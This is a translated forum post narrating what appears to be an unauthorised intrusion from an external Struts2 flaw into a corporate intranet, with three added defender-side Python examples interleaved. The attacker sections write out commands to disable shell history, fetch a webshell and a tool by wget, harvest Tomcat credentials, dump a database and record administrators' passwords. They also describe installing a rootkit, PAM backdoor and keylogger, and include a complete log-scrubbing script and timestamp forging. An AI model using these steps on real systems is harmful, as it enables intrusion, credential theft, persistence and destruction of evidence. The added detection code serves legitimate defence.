A Penetration Test Walkthrough: From the External Network into the Intranet (Original)


This article was first published on 習科: http://bbs.blackbap.org/thread-7483-1-1.html

Recently I lost my foothold in the intranet and needed to find a new entry point from the external network.
I used the Phoenix scanner (鳳凰掃描器) to generate a dictionary and scan for weak passwords, manually looked through some of the web services on the C-class segment, and scanned ports. Host .13 turned out to be running a Wingsoft application; I found a vulnerability for it on 烏雲 (WooYun), and the Struts2 S2-005 vulnerability gave me remote command execution.

0x02 Getting onto the perimeter server

Run

    unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0

so the system does not keep a record of our commands.
The default tools could not get a webshell onto the box. I looked at the web directory and ran chmod 777 +r /js/ to add write permission, but still no webshell; wget -O /web/js/help.jsp www.xxx.com/shell.txt could not write the file either.

Run

    locate tomcat-user.xml
    cat /mulu/tomcat-user.xml

With the password from that file I logged into the Tomcat manager and deployed a WAR package to get a webshell. Once in, I dropped several one-line backdoors and changed the files' creation times, then started collecting information from the webshell in preparation for the intranet penetration.

    netstat -tlnp   # see which intranet hosts have connections to this box

Remote addresses seen:

    10.19.1.56
    10.19.1.66
    192.168.1.184
    10.19.1.150
    10.22.1.222
    10.22.1.249
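The pivot above only worked because the manager credentials sat in clear text in tomcat-users.xml and the file was readable from the compromised web account. The following is an added defender-side check, not code from the post: it parses a tomcat-users.xml, flags accounts holding Manager/Host-Manager deployment roles, flags passwords that are not stored as digests, and flags a file mode that lets group or others read it. The digest heuristic (a "salt$iterations$hex" string or a bare 32+ character hex digest counts as hashed) and the sample XML are my assumptions and constructed input.

```python
import re
import stat
import xml.etree.ElementTree as ET

# Roles that let an account deploy or control applications through Tomcat's
# Manager / Host Manager apps; any holder of these is a WAR-deployment path.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                "manager-status", "admin-gui", "admin-script"}

# Heuristic (assumption): a digested credential looks like "salt$iterations$hex"
# (MessageDigestCredentialHandler) or a bare hex digest of >= 32 characters.
# Anything else is treated as a clear-text password.
_DIGEST_RE = re.compile(r"^(?:[0-9a-fA-F]+\$\d+\$)?[0-9a-fA-F]{32,}$")


def _local(tag):
    """Strip an XML namespace: '{http://tomcat.apache.org/xml}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text, file_mode=None):
    """Return findings as (subject, issue, detail) tuples.

    xml_text:  contents of conf/tomcat-users.xml
    file_mode: os.stat(path).st_mode of that file, if available
    """
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or "<unnamed>"
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        deploy = sorted(roles & DEPLOY_ROLES)
        if deploy:
            findings.append((name, "deploy-role", ",".join(deploy)))
        if password and not _DIGEST_RE.match(password):
            findings.append((name, "plaintext-password", "stored in clear text"))
    # The web application's own user must not be able to read this file;
    # group/other read bits are what let a webshell harvest the credentials.
    if file_mode is not None and file_mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(("tomcat-users.xml", "readable-by-others",
                         oct(stat.S_IMODE(file_mode))))
    return findings


# Constructed sample: one deployer with a clear-text password, one read-only
# account with a digest. Not taken from any real deployment.
SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="viewer"/>
  <user username="deployer" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="report" password="5f4dcc3b5aa765d89a6ba5e0a4f4f4dd" roles="viewer"/>
</tomcat-users>
"""

if __name__ == "__main__":
    # 0o100644 emulates a regular file with mode 644 (world-readable).
    for finding in audit_tomcat_users(SAMPLE_XML, file_mode=0o100644):
        print(finding)
```

Run it against a real file with `audit_tomcat_users(open(path).read(), os.stat(path).st_mode)`; a clean result is an empty list, and every deploy-role finding should correspond to an account you actually need for deployments.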

I dug through the configuration files, found the database on the 10.48.14.52 segment, connected to it and dumped the database, and searched for administrator passwords: three administrators (*陳, 劉*, 彭*) turned up and I recorded their passwords. Running python -h and nmap -h showed that the box had a Python environment.
I uploaded insightscan.py to scan, but it threw an error (and the scan was of no use anyway). I then uploaded the Phoenix scanner to try to gain a bit more privilege; the upload failed, so I switched to downloading the file instead:

    wget -O /tmp/xx.zip http://www.baidu.com/xx.zip
    unzip /tmp/xx.zip
    chmod 777 ff
    ./ff --<parameters>

This complained about a missing shared library (tmux: error while loading shared libraries: libevent-1.4.so.2: cannot open shared object file: No such file or directory). A search on Baidu gave the explanation:

There are generally two causes. Either the operating system really does not contain the shared library (the lib*.so.* file) or the installed version is wrong, in which case download and install the right one; or the library is installed, but when the program that needs it runs, it cannot find the library file on the default shared-library search path.
Reference: http://www.jb51.net/article/35383.htm
0x03 Maintaining access
(1) Install a rootkit
I installed an application-level rootkit, which is basically an encrypted nc: configure the port, the root account and a password and it is ready.
(2) Install a PAM backdoor to capture the root password
We have root locally but still need the local root password; when /etc/shadow cannot be cracked, a PAM backdoor or an SSH backdoor can be installed to record the root password.
Get the PAM version:

    rpm -qa|grep pam

References: http://www.freebuf.com/articles/system/24104.html
http://www.nxadmin.com/system/1199.html

(3) Install a keylogger
https://github.com/dorneanu/ixkeylog/
0x04 Log cleanup

(1) Cleaning the web logs

    awk '!/123.123.123.123|111.111.111.111|phpspy.php/' /var/log/httpd/access_log > temp && mv temp /var/log/httpd/access_log

    touch -amt 200901231532 filename   # this resets the file time

Of course there is also a trick for changing times in bulk:

    ls|xargs touch -amt 200901231532   # this one line changes the times directly
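Both touch commands above set only atime and mtime; on Linux the kernel updates the inode change time (ctime) to the current clock, so a file that claims to date from 2009 but whose ctime is from this week is the classic timestomping artefact. The following scanner is an added example written from the defender's side, not code from the post or from any tool it mentions: it walks a directory such as a web root and reports files whose ctime is recent while their mtime has been pushed far into the past. The thresholds (ctime within 7 days, mtime at least 30 days older than ctime) are illustrative assumptions, and the demo builds its own constructed files.

```python
import os
import stat
import tempfile
import time


def find_timestomped(paths, max_ctime_age=7 * 86400, min_gap=30 * 86400, now=None):
    """Return (path, mtime, ctime) for regular files whose inode changed recently
    but whose modification time is far older than that change.

    Assumption: thresholds are illustrative; tune them to the directory's churn.
    """
    now = time.time() if now is None else now
    suspects = []
    for path in paths:
        try:
            st = os.lstat(path)
        except OSError:
            continue  # vanished or unreadable: skip rather than abort the sweep
        if not stat.S_ISREG(st.st_mode):
            continue
        recently_changed = (now - st.st_ctime) <= max_ctime_age
        backdated = (st.st_ctime - st.st_mtime) >= min_gap
        if recently_changed and backdated:
            suspects.append((path, st.st_mtime, st.st_ctime))
    return suspects


def scan_tree(root, **kwargs):
    """Walk a directory tree (for example a web root) and apply find_timestomped."""
    paths = [os.path.join(d, f) for d, _, files in os.walk(root) for f in files]
    return find_timestomped(paths, **kwargs)


def demo():
    """Build a throwaway web root with one normal file and one backdated file
    (emulating `touch -amt 200901231532 help.jsp`); return the flagged names."""
    with tempfile.TemporaryDirectory() as root:
        normal = os.path.join(root, "index.jsp")
        backdated = os.path.join(root, "help.jsp")  # constructed sample file
        for p in (normal, backdated):
            with open(p, "w") as fh:
                fh.write("<%-- sample content --%>\n")
        # os.utime sets atime/mtime exactly like touch -amt; ctime stays "now".
        t = time.mktime(time.strptime("200901231532", "%Y%m%d%H%M"))
        os.utime(backdated, (t, t))
        return sorted(os.path.basename(p) for p, _, _ in scan_tree(root))


if __name__ == "__main__":
    print(demo())  # expected: ['help.jsp']
```

Two caveats for real use: mtime far behind ctime is also normal for files restored with cp -p or installed from packages, which is why the check is restricted to recent ctime and is best run over directories that should be static; and an attacker with root can defeat it by adjusting the system clock or editing inodes directly, so treat a hit as a lead to confirm against package manifests or backups rather than as proof.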

(2) Cleaning the system logs
I used 王子牛's Python script:

    #!/usr/bin/env python3
    # Usage: python log.py <ip-address>
    # Removes every line containing the given address from each log file below.

    import os
    import subprocess
    import sys


    def banner():
        print('''
    This is linux log clear script

       Welcome to www.90sec.org

        Python log.py 127.0.0.1

              By:Mr,PriNce''')


    # Candidate log locations; entries are stripped of stray whitespace before use.
    LOG_FILES = ["/var/log/messages","/var/log/messages.1","/etc/syslog.conf","/var/log/secure","/var/log/message","/var/log/lastlog","/var/log/auth.log","/var/log/vsftpd.log","/var/log/apache2/access.log","/var/log/apache2/error.log","/var/log/apache2/error.log.1","/usr/local/httpd/error.log","/apache/apache/message.log","/var/log/apache2/access_log","/var/log/apache2/error.log","/var/log/apache2/error_log ","/var/log/apache/access.log","/var/log/apache/access_log","/var/log/apache/error.log","/var/log/apache/error_log","/var/www/logs/error_log"," /var/www/logs/error.log"," /var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log"," /usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/usr/local/apache/logs/error_logerror_log.old","/usr/local/apache/logs/access_logaccess_log.old","/var/log/access.log","/var/log/access_log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access.log","/var/log/messages.1","/var/log/messages.2","/var/log/messages.3","/var/log/messages.4","/var/log/secure.1","/var/log/secure.2","/var/log/secure.3","/var/log/secure.3","/var/log/secure.4"]


    def main():
        # The original checked argv only after indexing it; check first instead.
        if len(sys.argv) < 2:
            banner()
            return
        host = sys.argv[1]
        for path in LOG_FILES:
            path = path.strip()
            if os.path.exists(path):
                subprocess.call("sed -i '/%s/d' %s" % (host, path), shell=True)
                print("[+]: %s " % path)
            else:
                print("[-]: %s " % path)


    if __name__ == "__main__":
        main()
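The awk filter in (1) and the sed loop in this script both rewrite logs in place on the compromised host, which is exactly the case an integrity checkpoint is meant to catch. The block below is an added example from the defender's side, serving both the web-log and the system-log passage; it is not code from the post. It computes a SHA-256 hash chain over the lines of a log, records a checkpoint (line count plus chain value) that is meant to be shipped off the host, and later verifies that the covered prefix is unchanged: honest appends still pass, while deleting, editing or reordering any line inside the covered range fails. The seed, the access_log lines and the addresses are constructed.

```python
import hashlib

# Constructed seed. In practice use a per-host secret held only on the collector,
# so the host cannot recompute checkpoints for a rewritten file.
SEED = b"example-log-chain-seed"


def chain_digests(lines, seed=SEED):
    """Return a list where element i is the chain value after lines[0..i]."""
    prev = hashlib.sha256(seed).digest()
    out = []
    for line in lines:
        prev = hashlib.sha256(prev + line.encode("utf-8", "surrogateescape")).digest()
        out.append(prev.hex())
    return out


def make_checkpoint(lines, seed=SEED):
    """Checkpoint = (lines covered, chain value at that point).
    Store it somewhere the host cannot rewrite (log collector, WORM storage)."""
    digests = chain_digests(lines, seed)
    return (len(lines), digests[-1] if digests else hashlib.sha256(seed).hexdigest())


def verify_against_checkpoint(lines, checkpoint, seed=SEED):
    """Check that the first `count` lines of the current file still reproduce the
    checkpoint. Returns (ok, reason). Lines appended after the checkpoint are
    allowed; any change inside the covered prefix fails."""
    count, expected = checkpoint
    if len(lines) < count:
        return False, "log has fewer lines than the checkpoint covers"
    _, actual = make_checkpoint(lines[:count], seed)
    if actual != expected:
        return False, "covered prefix no longer matches checkpoint"
    return True, "ok"


# Constructed access_log lines; addresses are from documentation ranges.
ACCESS_LOG = [
    '10.0.0.5 - - [12/Mar/2015:10:01:02 +0800] "GET / HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Mar/2015:10:01:09 +0800] "POST /js/help.jsp HTTP/1.1" 200 17',
    '10.0.0.9 - - [12/Mar/2015:10:02:30 +0800] "GET /login HTTP/1.1" 302 0',
]


def demo():
    """Take a checkpoint, then emulate awk '!/203.0.113.7/' on the file and,
    separately, an honest append. Return (scrubbed_ok, appended_ok)."""
    cp = make_checkpoint(ACCESS_LOG)
    scrubbed = [line for line in ACCESS_LOG if "203.0.113.7" not in line]
    appended = ACCESS_LOG + [
        '10.0.0.5 - - [12/Mar/2015:10:05:00 +0800] "GET /about HTTP/1.1" 200 88'
    ]
    return (verify_against_checkpoint(scrubbed, cp)[0],
            verify_against_checkpoint(appended, cp)[0])


if __name__ == "__main__":
    print(demo())  # expected: (False, True)
```

The checkpoint only helps if it leaves the host before the attacker does; the usual arrangement is to forward logs to a collector in near real time (rsyslog or a shipper) and have the collector take and store the checkpoints, so that a host-side sed -i leaves a verifiable discrepancy instead of a clean file.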

I've been on 習科 for a long time, so here is an article for the site. To be continued: the intranet has two domains, I am still wandering around the first one and have not got domain controller privileges yet. To be continued...
